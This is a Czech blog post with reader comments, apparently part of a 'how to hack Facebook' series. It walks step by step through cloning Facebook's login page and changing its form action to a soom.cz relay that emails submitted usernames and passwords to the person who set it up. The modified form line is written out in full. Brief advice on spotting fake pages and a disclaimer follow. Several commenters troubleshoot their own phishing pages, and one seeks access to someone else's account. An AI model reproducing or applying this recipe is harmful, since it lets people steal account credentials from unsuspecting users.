Phishing

Bře 18
2012

Další cizí slovo, který nejspíš většině z Vás nic neřekne. Phishing vychází z anglické slova fishing což  znamená rybaření, myšleno v kontextu jako “návnada” a počáteční písmeno f je nahrazeno ph, což má trošku hlubší význam, pokud Vás to zajímá mrkněte na wikipedia.cz. Abych to uzavřel, přeložil bych Phishing trošku nadnešeně jako – “návnady pro lamy” 🙂 . Ajťáci pochopí, laická veřejnost asi bude dumat proč, jsem použil slovo lamy. Ale to by bylo na další vysvětlování.

Co to tedy přesně dělá a jak mi to pomůže hacknou někomu účet? Phishing je podvodná technika používaná na Internetu k získávání citlivých údajů,  nejčastěji se jedná o zadání osobních údajů na falešnou stránku, která na první pohled není k rozeznání od skutečné stránky. V podstatě uživatel, takto věnuje své citlivá data aniž by měl ponětí, že právě naletěl podvodníkům.

Takže náš úkol bude vytvořit totožnou kopii Facebook úvodní příhlašovací stránky, kterou tak všichni dobře známe. Následovně zařídit, aby jsme obdrželi takto získané údaje na svůj email. První krok, přejděte na stránka facebook.com, klikněte pravým tlačítkem myši kamkoliv na stránku, z menu vyberte Zobrazit zdrojkový kód stránky ( Google Chrome ) , Zobrazit zdrojový kód ( IE 9 ) , Zobrazit zdrojový kód stránky ( Firefox ) . Použijte kombinaci kláves CTRL + A označit vše, CTRL + C kopírovat.  Otevřete si nyní např. notepad nebo word a vložte CTRL + V . Nyní jděte na stránku soom.cz , proveďte registraci na stránkách  a následovně z pravého menu vyberte GET2MAIL a klikněte na možnost Registrovat nové id . Vygeneruje se Vám ID, které zhruba bude vypadat nějak následovně 02184f4679 . Klikněte na něj a zaškrtněte možnost – Zasílat data e-mailem (vas@email.cz)  Nyní se vraťte zpět ke zdrojovému kódu stránky a v kódu najděte spojení:

<form id=”POST” action=” https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

a nahraďte

<form id=”POST” action=” http://www.soom.cz/projects/get2mail/redir.php?id= 02184f4679&url=https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

za červený text dosaďte Vaše ID, které jste si vygenerovali na stránkách soom.cz. Nyní celý text opět označte CTRL + A a kopírujte CTRL + C . Otevřete si stránku pastehtml.com , nakopírujte změněný zdrojový kód Facebooku. Klikněte na modré tlačítko Publish page a opět vpravo nahoře na Publish page. Objeví se Vám stránka s linkem, tento link si zkopírujte a vložte do prohlížeče. Tadááá výsledek je na světě, mrkněte jak by zhruba měl vypadat >> SEM  << . Nyní stačí jen, když Vám někdo na této stránce vyplní přihlášení na svůj profil a Vám tak automaticky přijdou tyto informace na email.

  • Je to skutečně tak vážný?

Ano, jedná se o celkem vážný případ, kdy méně znalý uživatel může naletět na takto podvodně vytvořené stránky. Neboť i když se stránka nachází na jiné doméně, mnozí nepozorní uživatelé si toho nevšimnou a to nemluvím, že není větší problém, stránku nechat otevírat ve framu aniž by byla adresa stránky vůbec vidět ! Mimo to,  uživatel zadá svoje přihlašovací údaje a následovně mu naskočí pravá facebook stránka!  Uživatel se  tak domnívá, že pouze špatně vyplnil heslo, neboť ho facebook vyžaduje znova ! Ve skutečnosti, však právě jeho heslo odešlo někomu do mejl boxu a on se poprvé skutečně hlásí do svého FB profilu.

  • Jak se mám bránit?

Jediným řešením je neklikat na různé tlačítka líbí se mi, neklikat na odkazy odkazující na facebook z jiných stránek. Vždy se přihlašujte na svůj Facebook profil pouze přes doménu www.facebook.com ! Jakmile zpozorujete cokoliv jiného, rychle ze stránek vycouvejte! Kontrolujte adresu stránky ve Vašem prohlížeči, případně když najedete myší na jakýkoliv odkaz, většinou se v prohlížeči vlevo dole, při najetí na odkaz zobrazí skutečná adresa stránky, na kterou budete odkázáni.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.

12 komentářů to “Phishing”

  1. Jan says:

    nemám v tom wordu”” tím pádem mi to nejde nahradit … takže co dělám špatně?

  2. Sievert says:

    Prosím blíže specifikovat dotaz 😉

  3. jefh says:

    zdravim schvalne jsem to testoval na svejch emailech.Delal jsem vse podle navodu ale kdyz na tu fiktivni stranku napisu prihl.jmeno a heslo jednoho z mejch uctu tak mi to ukaze 403 Forbidden zde http://pastehtml.com/view/bubyw20lp.html co je spatne prosil bych o radu

  4. Kempino says:

    vše jsem dělal podle příkazů ale když došlo na hledání toho kódu konkrtétně

    tak jsem selhal ptže ten kód tam nikde není

  5. Kempino says:

    konkrténě myslím ten kód hned po tom A nyní se vraťte ke zdrojovému kódu stránky a najděte v něm: ten kód

  6. Kempino says:

    aha už ho mám…

  7. Asibanan says:

    Ahoj, tak sem si to taky chtel vyzkoušet a našel jsem akorát kod je to on, nebo jsem slepý?

  8. BadDrake says:

    Dobrý den,
    Včera jsem se na vaše stránky dostal čirou náhodou. Jelikož uvažuji o koupi xboxu, chtěl jsem si něco zjistit o “hacknutí” xboxu, místo toho mi ale vyskočila vaše stránka s nápisem “Jak hacknout Facebook.” No zvědavost mi nedala a po přečtení mi spadla brada, jak je to jednoduché. O všech způsobech krom “phisingu” sem věděl a tak sem si teda řekl, že si ho vyzkouším. Jak jinak se tomu člověk má bránit, než že se tomu trochu věnuje a vyzkouší si to 😀 Ale samotný kod

    Jsem nikde nenašel. Nejbližší je mu

    Je to on, nebo jenom špatně hledám. Totiž když tento kod nahradím, fiktivní stránka vypadá zcela normálně, ale po přihlášení se objeví chyba 403-FORBIDDEN.

  9. Tomáš says:

    zdravím potřeboval bych se někomu dostat na FB účet je to nutné tak kdyžtak pište na Email Hendy1@seznam.cz určitě se nějak dohodneme .-)

  10. KIKA says:

    Čau vsechno mám jen mi nechodí ty mailu s heslama skusila jsem to na sve strance první ze svym fb to snad necemu vadí? =D

  11. Sievert says:

    Omlouvám se, ale nebudu v tomto směru jakkoliv někomu pomáhat…. tento článek, opravdu slouží jen pouze k informování o nebezpečnosti tohoto typu průniku do FB účtu!!

  12. Jou Tod says:

    Vse ok jen to pise chybu a nechodi na mail zadne data. Co s tim

Leave a Reply